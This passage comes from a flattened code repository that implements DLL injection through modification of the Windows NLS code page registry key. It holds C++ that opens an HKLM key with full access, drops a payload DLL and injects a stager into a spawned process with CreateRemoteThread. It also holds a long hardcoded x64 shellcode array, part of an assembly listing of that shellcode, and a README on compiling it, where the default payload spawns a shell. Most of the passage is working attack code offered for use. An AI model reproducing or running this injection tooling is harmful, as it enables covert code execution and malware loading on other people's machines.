Last error is 0x%x\n", GetLastError()); 269 | return; 270 | } 271 | HANDLE hThread = CreateRemoteThread(regObject->m_procInfo.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)ShellcodeMemory, lpCodePageID, 0, nullptr); 272 | if (hThread == INVALID_HANDLE_VALUE) { 273 | std::printf("Could not open a handle to the payload .exe\n"); 274 | return; 275 | } 276 | std::printf("Sucessfully injected to remote process, where shellcodeMemory is %p, and the codePageID is %d\n", ShellcodeMemory, codePageID); 277 | } 278 | 279 | //Error of payload is at writing the payload.dll! 280 | bool OpenKeyForNlsModification(PRegistryKey regObject) noexcept 281 | { 282 | bool bResult = false; 283 | if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, regObject->getStringBuffer(Index::SUBKEY_KEY_VALUE), 284 | 0, KEY_ALL_ACCESS, ®Object->hSubkeyNls) != EXIT_SUCCESS) 285 | { 286 | std::printf("Could not open handle to subkey of codePage!, LastError [0x%x]\n", GetLastError()); 287 | return bResult; 288 | } 289 | if (!DropSystemDllPayload(regObject)) { 290 | std::printf("Payload dll has been failed to drop main payload \n"); 291 | return bResult; 292 | } 293 | if (!IterateCodePageAndExtractProperId(regObject)){ 294 | std::printf("Could not iterate key for proper modification. 
Last error: [0x%x]\n", GetLastError()); 295 | return bResult; 296 | } 297 | //DWORD dwCodePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt); 298 | //std::printf("The code page ID is %d\n", dwCodePageID); 299 | //SelfSpawnPayload(dwCodePageID); 300 | if (CreateProcessToInject(®Object->m_procInfo)) 301 | { 302 | InjectStagerToPayload(regObject); 303 | } 304 | 305 | return bResult; 306 | } 307 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/payload.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "headers.hpp" 3 | 4 | 5 | //Appply namespaces to this functions, maybe inside of a class itself :) 6 | BOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive); 7 | bool OpenKeyForNlsModification(PRegistryKey regObject) noexcept; 8 | UINT StringToInt(PWCHAR str) noexcept; 9 | bool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues); 10 | bool IterateCodePageAndExtractProperId(PRegistryKey regObject); 11 | bool CreateProcessToInject(LPPROCESS_INFORMATION procInfo); 12 | bool DropSystemDllPayload(PRegistryKey regObject); 13 | void InjectStagerToPayload(PRegistryKey regObject); 14 | UINT StringToInt(PWCHAR str) noexcept; 15 | UINT StringToIntDecimal(PWCHAR str) noexcept; 16 | 17 | //PIC shellcode. 
18 | constexpr BYTE StubInject[] = { 0x56,0x48,0x8b,0xf4,0x48,0x83,0xe4,0xf0,0x48,0x83,0xec,0x20,0xe8,0x05,0x00,0x00,0x00,0x48,0x8b,0xe6,0x5e,0xc3,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x58,0x48,0x8d,0x4c,0x24,0x20,0xe8,0x87,0x00,0x00,0x00,0x85,0xc0,0x74,0x07,0xb8,0x01,0x00,0x00,0x00,0xeb,0x11,0x48,0x8d,0x54,0x24,0x20,0x48,0x8b,0x4c,0x24,0x60,0xe8,0x07,0x00,0x00,0x00,0x33,0xc0,0x48,0x83,0xc4,0x58,0xc3,0x48,0x89,0x54,0x24,0x10,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x38,0x48,0x8b,0x44,0x24,0x40,0x8b,0x00,0x89,0x44,0x24,0x40,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x08,0x48,0x85,0xc0,0x75,0x0e,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x18,0x85,0xc0,0x75,0x02,0xeb,0x2d,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x48,0xff,0x10,0x85,0xc0,0x75,0x02,0xeb,0x1c,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x10,0x85,0xc0,0x75,0x02,0xeb,0x0a,0x33,0xc9,0x48,0x8b,0x44,0x24,0x48,0xff,0x50,0x20,0x48,0x83,0xc4,0x38,0xc3,0x48,0x89,0x4c,0x24,0x08,0x48,0x81,0xec,0xd8,0x00,0x00,0x00,0xb8,0x6b,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa0,0x00,0x00,0x00,0xb8,0x65,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa2,0x00,0x00,0x00,0xb8,0x72,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa4,0x00,0x00,0x00,0xb8,0x6e,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa6,0x00,0x00,0x00,0xb8,0x65,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xa8,0x00,0x00,0x00,0xb8,0x6c,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xaa,0x00,0x00,0x00,0xb8,0x33,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xac,0x00,0x00,0x00,0xb8,0x32,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xae,0x00,0x00,0x00,0xb8,0x2e,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb0,0x00,0x00,0x00,0xb8,0x64,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb2,0x00,0x00,0x00,0xb8,0x6c,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb4,0x00,0x00,0x00,0xb8,0x6c,0x00,0x00,0x00,0x66,0x89,0x84,0x24,0xb6,0x00,0x00,0x00,0x33,0xc0,0x66,0x89,0x84,0x24,0xb8,0x00,0x00,0x00,0x48,0x8d,0x8c,0x24,0xa0,0x00,0x00,0x00,0xe8,0xe4,0x05,0x00,0x00,0x48,0x89,0x84,0x24,0x98,0x00,0x00,0x00,0x48,0x83,0xbc,0x24,0x98,0x00,0x00,0x00,0x00,0x75,0x0a,0xb8,0x01,0x00,0x00,0x00,0xe9,0x8
f,0x03,0x00,0x00,0xc6,0x44,0x24,0x40,0x47,0xc6,0x44,0x24,0x41,0x65,0xc6,0x44,0x24,0x42,0x74,0xc6,0x44,0x24,0x43,0x50,0xc6,0x44,0x24,0x44,0x72,0xc6,0x44,0x24,0x45,0x6f,0xc6,0x44,0x24,0x46,0x63,0xc6,0x44,0x24,0x47,0x41,0xc6,0x44,0x24,0x48,0x64,0xc6,0x44,0x24,0x49,0x64,0xc6,0x44,0x24,0x4a,0x72,0xc6,0x44,0x24,0x4b,0x65,0xc6,0x44,0x24,0x4c,0x73,0xc6,0x44,0x24,0x4d,0x73,0xc6,0x44,0x24,0x4e,0x00,0x48,0x8d,0x54,0x24,0x40,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0xe8,0x3a,0x03,0x00,0x00,0x48,0x89,0x84,0x24,0xc0,0x00,0x00,0x00,0x48,0x83,0xbc,0x24,0xc0,0x00,0x00,0x00,0x00,0x75,0x0a,0xb8,0x03,0x00,0x00,0x00,0xe9,0x15,0x03,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x8b,0x8c,0x24,0xc0,0x00,0x00,0x00,0x48,0x89,0x48,0x28,0xc6,0x44,0x24,0x50,0x47,0xc6,0x44,0x24,0x51,0x65,0xc6,0x44,0x24,0x52,0x74,0xc6,0x44,0x24,0x53,0x43,0xc6,0x44,0x24,0x54,0x6f,0xc6,0x44,0x24,0x55,0x6e,0xc6,0x44,0x24,0x56,0x73,0xc6,0x44,0x24,0x57,0x6f,0xc6,0x44,0x24,0x58,0x6c,0xc6,0x44,0x24,0x59,0x65,0xc6,0x44,0x24,0x5a,0x57,0xc6,0x44,0x24,0x5b,0x69,0xc6,0x44,0x24,0x5c,0x6e,0xc6,0x44,0x24,0x5d,0x64,0xc6,0x44,0x24,0x5e,0x6f,0xc6,0x44,0x24,0x5f,0x77,0xc6,0x44,0x24,0x60,0x00,0xc6,0x44,0x24,0x30,0x41,0xc6,0x44,0x24,0x31,0x6c,0xc6,0x44,0x24,0x32,0x6c,0xc6,0x44,0x24,0x33,0x6f,0xc6,0x44,0x24,0x34,0x63,0xc6,0x44,0x24,0x35,0x43,0xc6,0x44,0x24,0x36,0x6f,0xc6,0x44,0x24,0x37,0x6e,0xc6,0x44,0x24,0x38,0x73,0xc6,0x44,0x24,0x39,0x6f,0xc6,0x44,0x24,0x3a,0x6c,0xc6,0x44,0x24,0x3b,0x65,0xc6,0x44,0x24,0x3c,0x00,0xc6,0x44,0x24,0x20,0x53,0xc6,0x44,0x24,0x21,0x65,0xc6,0x44,0x24,0x22,0x74,0xc6,0x44,0x24,0x23,0x43,0xc6,0x44,0x24,0x24,0x6f,0xc6,0x44,0x24,0x25,0x6e,0xc6,0x44,0x24,0x26,0x73,0xc6,0x44,0x24,0x27,0x6f,0xc6,0x44,0x24,0x28,0x6c,0xc6,0x44,0x24,0x29,0x65,0xc6,0x44,0x24,0x2a,0x43,0xc6,0x44,0x24,0x2b,0x50,0xc6,0x44,0x24,0x2c,0x00,0xc6,0x44,0x24,0x68,0x53,0xc6,0x44,0x24,0x69,0x65,0xc6,0x44,0x24,0x6a,0x74,0xc6,0x44,0x24,0x6b,0x43,0xc6,0x44,0x24,0x6c,0x6f,0xc6,0x44,0x24,0x6d,0x6e,0xc6,0x44,0x24,0x6e,0x73,0xc6,0x44,0x24,0x6f,0x6
f,0xc6,0x44,0x24,0x70,0x6c,0xc6,0x44,0x24,0x71,0x65,0xc6,0x44,0x24,0x72,0x4f,0xc6,0x44,0x24,0x73,0x75,0xc6,0x44,0x24,0x74,0x74,0xc6,0x44,0x24,0x75,0x70,0xc6,0x44,0x24,0x76,0x75,0xc6,0x44,0x24,0x77,0x74,0xc6,0x44,0x24,0x78,0x43,0xc6,0x44,0x24,0x79,0x50,0xc6,0x44,0x24,0x7a,0x00,0xc6,0x84,0x24,0x80,0x00,0x00,0x00,0x53,0xc6,0x84,0x24,0x81,0x00,0x00,0x00,0x65,0xc6,0x84,0x24,0x82,0x00,0x00,0x00,0x74,0xc6,0x84,0x24,0x83,0x00,0x00,0x00,0x54,0xc6,0x84,0x24,0x84,0x00,0x00,0x00,0x68,0xc6,0x84,0x24,0x85,0x00,0x00,0x00,0x72,0xc6,0x84,0x24,0x86,0x00,0x00,0x00,0x65,0xc6,0x84,0x24,0x87,0x00,0x00,0x00,0x61,0xc6,0x84,0x24,0x88,0x00,0x00,0x00,0x64,0xc6,0x84,0x24,0x89,0x00,0x00,0x00,0x55,0xc6,0x84,0x24,0x8a,0x00,0x00,0x00,0x49,0xc6,0x84,0x24,0x8b,0x00,0x00,0x00,0x4c,0xc6,0x84,0x24,0x8c,0x00,0x00,0x00,0x61,0xc6,0x84,0x24,0x8d,0x00,0x00,0x00,0x6e,0xc6,0x84,0x24,0x8e,0x00,0x00,0x00,0x67,0xc6,0x84,0x24,0x8f,0x00,0x00,0x00,0x75,0xc6,0x84,0x24,0x90,0x00,0x00,0x00,0x61,0xc6,0x84,0x24,0x91,0x00,0x00,0x00,0x67,0xc6,0x84,0x24,0x92,0x00,0x00,0x00,0x65,0xc6,0x84,0x24,0x93,0x00,0x00,0x00,0x00,0x48,0x8d,0x54,0x24,0x68,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x01,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x38,0x00,0x75,0x0a,0xb8,0x04,0x00,0x00,0x00,0xe9,0xf0,0x00,0x00,0x00,0x48,0x8d,0x54,0x24,0x50,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x08,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x08,0x00,0x75,0x0a,0xb8,0x05,0x00,0x00,0x00,0xe9,0xb3,0x00,0x00,0x00,0x48,0x8d,0x54,0x24,0x20,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x10,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x10,0x00,0x75,0x07,0xb8,0x06,0x00,0x00,0x00,0xeb,0x79,0x48,0x8d,0x54,0x24,0x30,0x48,0x8
b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x18,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x18,0x00,0x75,0x07,0xb8,0x07,0x00,0x00,0x00,0xeb,0x3f,0x48,0x8d,0x94,0x24,0x80,0x00,0x00,0x00,0x48,0x8b,0x8c,0x24,0x98,0x00,0x00,0x00,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0xff,0x50,0x28,0x48,0x8b,0x8c,0x24,0xe0,0x00,0x00,0x00,0x48,0x89,0x41,0x20,0x48,0x8b,0x84,0x24,0xe0,0x00,0x00,0x00,0x48,0x83,0x78,0x20,0x00,0x75,0x07,0xb8,0x08,0x00,0x00,0x00,0xeb,0x02,0x33,0xc0,0x48,0x81,0xc4,0xd8,0x00,0x00,0x00,0xc3,0x48,0x89,0x54,0x24,0x10,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x78,0x48,0x8b,0x84,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x30,0x48,0x8b,0x44,0x24,0x30,0x0f,0xb7,0x00,0x3d,0x4d,0x5a,0x00,0x00,0x74,0x07,0x33,0xc0,0xe9,0xfa,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x30,0x48,0x63,0x40,0x3c,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89,0x44,0x24,0x40,0xb8,0x08,0x00,0x00,0x00,0x48,0x6b,0xc0,0x00,0x48,0x8b,0x4c,0x24,0x40,0x48,0x8d,0x84,0x01,0x88,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x38,0x48,0x8b,0x44,0x24,0x38,0x83,0x38,0x00,0x75,0x07,0x33,0xc0,0xe9,0xb2,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x38,0x8b,0x00,0x89,0x44,0x24,0x18,0x8b,0x44,0x24,0x18,0x48,0x03,0x84,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x10,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x18,0x48,0x89,0x44,0x24,0x48,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x1c,0x89,0x44,0x24,0x24,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x20,0x89,0x44,0x24,0x1c,0x48,0x8b,0x44,0x24,0x10,0x8b,0x40,0x24,0x89,0x44,0x24,0x20,0x48,0xc7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xeb,0x0d,0x48,0x8b,0x44,0x24,0x08,0x48,0xff,0xc0,0x48,0x89,0x44,0x24,0x08,0x48,0x8b,0x44,0x24,0x48,0x48,0x39,0x44,0x24,0x08,0x0f,0x83,0x3b,0x01,0x00,0x00,0x8b,0x44,0x24,0x1c,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x8b,0x4c,0x24,0x08,0x48,0x8d,0x04,0x88,0x48,0x89,0x44,0x24,0x58,0x8b,0x44,0x24,0x20,0x48,0x8b,0x8c,0x2
4,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x8b,0x4c,0x24,0x08,0x48,0x8d,0x04,0x48,0x48,0x89,0x44,0x24,0x50,0x8b,0x44,0x24,0x24,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x8b,0x4c,0x24,0x50,0x0f,0xb7,0x09,0x48,0x8d,0x04,0x88,0x48,0x89,0x44,0x24,0x60,0x48,0x8b,0x44,0x24,0x58,0x8b,0x00,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x48,0x89,0x44,0x24,0x28,0x48,0xc7,0x04,0x24,0x00,0x00,0x00,0x00,0xeb,0x0b,0x48,0x8b,0x04,0x24,0x48,0xff,0xc0,0x48,0x89,0x04,0x24,0x48,0x8b,0x04,0x24,0x48,0x8b,0x8c,0x24,0x88,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x74,0x45,0x48,0x8b,0x04,0x24,0x48,0x8b,0x4c,0x24,0x28,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x74,0x2f,0x48,0x8b,0x04,0x24,0x48,0x8b,0x8c,0x24,0x88,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x48,0x8b,0x0c,0x24,0x48,0x8b,0x54,0x24,0x28,0x48,0x03,0xd1,0x48,0x8b,0xca,0x0f,0xbe,0x09,0x3b,0xc1,0x74,0x02,0xeb,0x02,0xeb,0x97,0x48,0x8b,0x04,0x24,0x48,0x8b,0x8c,0x24,0x88,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x75,0x2d,0x48,0x8b,0x04,0x24,0x48,0x8b,0x4c,0x24,0x28,0x48,0x03,0xc8,0x48,0x8b,0xc1,0x0f,0xbe,0x00,0x85,0xc0,0x75,0x17,0x48,0x8b,0x44,0x24,0x60,0x8b,0x00,0x48,0x8b,0x8c,0x24,0x80,0x00,0x00,0x00,0x48,0x03,0xc8,0x48,0x8b,0xc1,0xeb,0x07,0xe9,0xa8,0xfe,0xff,0xff,0x33,0xc0,0x48,0x83,0xc4,0x78,0xc3,0x48,0x89,0x4c,0x24,0x08,0x48,0x83,0xec,0x58,0x65,0x48,0x8b,0x04,0x25,0x60,0x00,0x00,0x00,0x48,0x89,0x44,0x24,0x40,0x48,0x8b,0x44,0x24,0x40,0x48,0x8b,0x40,0x18,0x48,0x89,0x44,0x24,0x48,0x48,0x8b,0x44,0x24,0x48,0x48,0x83,0xc0,0x20,0x48,0x89,0x44,0x24,0x38,0x48,0x8b,0x44,0x24,0x38,0x48,0x8b,0x00,0x48,0x89,0x44,0x24,0x30,0xeb,0x0d,0x48,0x8b,0x44,0x24,0x30,0x48,0x8b,0x00,0x48,0x89,0x44,0x24,0x30,0x48,0x8b,0x44,0x24,0x38,0x48,0x39,0x44,0x24,0x30,0x0f,0x84,0xbf,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x30,0x48,0x83,0xe8,0x10,0x48,0x89,0x44,0x24,0x28,0x48,0x83,0x7c,0x24,0x28,0x00,0x74,0x0c,0x4
8,0x8b,0x44,0x24,0x28,0x48,0x83,0x78,0x30,0x00,0x75,0x05,0xe9,0x98,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x28,0x48,0x8b,0x40,0x60,0x48,0x89,0x44,0x24,0x10,0x48,0x83,0x7c,0x24,0x10,0x00,0x75,0x02,0xeb,0xa4,0x48,0xc7,0x04,0x24,0x00,0x00,0x00,0x00,0xeb,0x0b,0x48,0x8b,0x04,0x24,0x48,0xff,0xc0,0x48,0x89,0x04,0x24,0x48,0x8b,0x44,0x24,0x28,0x0f,0xb7,0x40,0x58,0x48,0x39,0x04,0x24,0x0f,0x83,0x26,0x01,0x00,0x00,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x74,0x11,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x75,0x05,0xe9,0xff,0x00,0x00,0x00,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x5a,0x7f,0x47,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x41,0x7c,0x35,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xe8,0x41,0x83,0xc0,0x61,0x89,0x44,0x24,0x20,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x54,0x24,0x20,0x66,0x89,0x14,0x48,0x0f,0xb7,0x44,0x24,0x20,0x66,0x89,0x44,0x24,0x08,0xeb,0x12,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x66,0x89,0x44,0x24,0x08,0x0f,0xb7,0x44,0x24,0x08,0x66,0x89,0x44,0x24,0x18,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x5a,0x7f,0x47,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xf8,0x41,0x7c,0x35,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x83,0xe8,0x41,0x83,0xc0,0x61,0x89,0x44,0x24,0x24,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x54,0x24,0x24,0x66,0x89,0x14,0x48,0x0f,0xb7,0x44,0x24,0x24,0x66,0x89,0x44,0x24,0x0a,0xeb,0x12,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x66,0x89,0x44,0x24,0x0a,0x0f,0xb7,0x44,0x24,0x0a,0x66,0x89,0x44,0x24,0x1c,0x0f,0xb7,0x44,0x24,0x18,0x0f,0xb7,0x4c,0x24,0x1c,0x3b,0xc1,0x74,0x02,0xeb,0x05,0xe9,0xbc,0xfe,0xff,0xff,0x48,0x8b,0x44,0x24,0x60,0x48,0x8b,0x0c,0x24,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x75,0x1c,0x48,0x8b,0x44,0x24,0x10,0x48,0x8b,0x0c,0x2
4,0x0f,0xb7,0x04,0x48,0x85,0xc0,0x75,0x0b,0x48,0x8b,0x44,0x24,0x28,0x48,0x8b,0x40,0x30,0xeb,0x07,0xe9,0x24,0xfe,0xff,0xff,0x33,0xc0,0x48,0x83,0xc4,0x58,0xc3,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; 19 | constexpr size_t lengthInject = std::size(StubInject); 20 | -------------------------------------------------------------------------------- /NLSRegistryCodeInjection/resource1.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzhsec/NlsCodeInjectionThroughRegistry/2b9ebbe3c4f203d16f537080009f9c0992916277/NLSRegistryCodeInjection/resource1.h -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NlsCodeInjectionThroughRegistry 2 | Dll injection through registry modification of NLS code page ID. 3 | 4 | It requieres administrator privileges, but it definetely works. 5 | 6 | # How does it work? 7 | It is based on jonas lykk discovery here: https://twitter.com/jonaslyk/status/1352729173631135751?lang=en 8 | 9 | There is two ways to accomplish this: 10 | Either call SetThreadLocale and set up an export function named NlsDllCodePageTranslation, where your main payload is in there. 
11 | Or the second method, which is the one actually implemented here: the payload can be triggered through functions such as SetConsoleCP or SetConsoleOutputCP, so you don't need to care about exports at all. 12 | 13 | If the target process is not console based, you can allocate one with AllocConsole (the stager does this when GetConsoleWindow returns NULL); the payload will still get triggered. 14 | 15 | For this reason, to make it work, I had to write position-independent shellcode and inject it into a remote process, where it acts as a stager for the actual loading of the DLL. 16 | This is meant for demonstration purposes only: it modifies a registry value (which is why administrator privileges are needed), so run it in a disposable VM and make sure the original value is restored afterwards. 17 | 18 | One day in the future I will reverse-engineer in more detail how this works, if I have time. 19 | 20 | # How to use? 21 | Compile the project as Release x64; it uses Jonas's default payload DLL, which spawns a shell when loaded. 22 | ShellcodeInjection is just an additional project I used to convert C to shellcode, using hasherezade's method described here: 23 | https://github.com/vxunderground/VXUG-Papers/blob/main/From%20a%20C%20project%20through%20assembly%20to%20shellcode.pdf 24 | 25 | x64 only; tested on Windows 11. 26 | -------------------------------------------------------------------------------- /ShellcodeInjection/ShellcodeInjection.asm: -------------------------------------------------------------------------------- 1 | ; Listing generated by Microsoft (R) Optimizing Compiler Version 19.30.30706.0 2 | 3 | include listing.inc 4 | 5 | ;INCLUDELIB LIBCMT 6 | ;INCLUDELIB OLDNAMES 7 | 8 | PUBLIC ?iat_kernel32@@3Ukernel32Iat@@A ; iat_kernel32 9 | PUBLIC ?piat_struct32@@3PEAUkernel32Iat@@EA ; piat_struct32 10 | _BSS SEGMENT 11 | ?iat_kernel32@@3Ukernel32Iat@@A DB 030H DUP (?) ; iat_kernel32 12 | ?piat_struct32@@3PEAUkernel32Iat@@EA DQ 01H DUP (?) 
; piat_struct32 13 | _BSS ENDS 14 | PUBLIC ?GetModuleByName@@YAPEAXPEA_W@Z ; GetModuleByName 15 | PUBLIC ?GetFunctionByName@@YAPEAXPEAXPEAD@Z ; GetFunctionByName 16 | PUBLIC ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z ; initializeIatShellcode 17 | PUBLIC ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z ; SpawnPayload 18 | PUBLIC main 19 | ; COMDAT voltbl 20 | voltbl SEGMENT 21 | _volmd DB 09H 22 | voltbl ENDS 23 | ; Function compile flags: /Odtp 24 | _TEXT SEGMENT 25 | AlignRSP PROC 26 | push rsi ; Preserve RSI since we're stomping on it 27 | mov rsi, rsp ; Save the value of RSP so it can be restored 28 | and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes 29 | sub rsp, 020h ; Allocate homing space for ExecutePayload 30 | call main ; Call the entry point of the payload 31 | mov rsp, rsi ; Restore the original value of RSP 32 | pop rsi ; Restore RSI 33 | ret ; Return to caller 34 | AlignRSP ENDP 35 | _TEXT ENDS 36 | 37 | _TEXT SEGMENT 38 | iat$ = 32 39 | dwCodeID$ = 96 40 | main PROC 41 | ; File C:\Users\USER\source\repos\NLSRegistryCodeInjection\ShellcodeInjection\ShellcodeInjection.cpp 42 | ; Line 69 43 | $LN4: 44 | mov QWORD PTR [rsp+8], rcx 45 | sub rsp, 88 ; 00000058H 46 | ; Line 71 47 | lea rcx, QWORD PTR iat$[rsp] 48 | call ?initializeIatShellcode@@YAIAEAUkernel32Iat@@@Z ; initializeIatShellcode 49 | test eax, eax 50 | je SHORT $LN2@main 51 | ; Line 72 52 | mov eax, 1 53 | jmp SHORT $LN1@main 54 | $LN2@main: 55 | ; Line 74 56 | lea rdx, QWORD PTR iat$[rsp] 57 | mov rcx, QWORD PTR dwCodeID$[rsp] 58 | call ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z ; SpawnPayload 59 | ; Line 76 60 | xor eax, eax 61 | $LN1@main: 62 | ; Line 77 63 | add rsp, 88 ; 00000058H 64 | ret 0 65 | main ENDP 66 | _TEXT ENDS 67 | ; Function compile flags: /Odtp 68 | _TEXT SEGMENT 69 | dwCodePageID$ = 32 70 | dwCodePageId$ = 64 71 | iat$ = 72 72 | ?SpawnPayload@@YAXPEAKAEAUkernel32Iat@@@Z PROC ; SpawnPayload 73 | ; File 
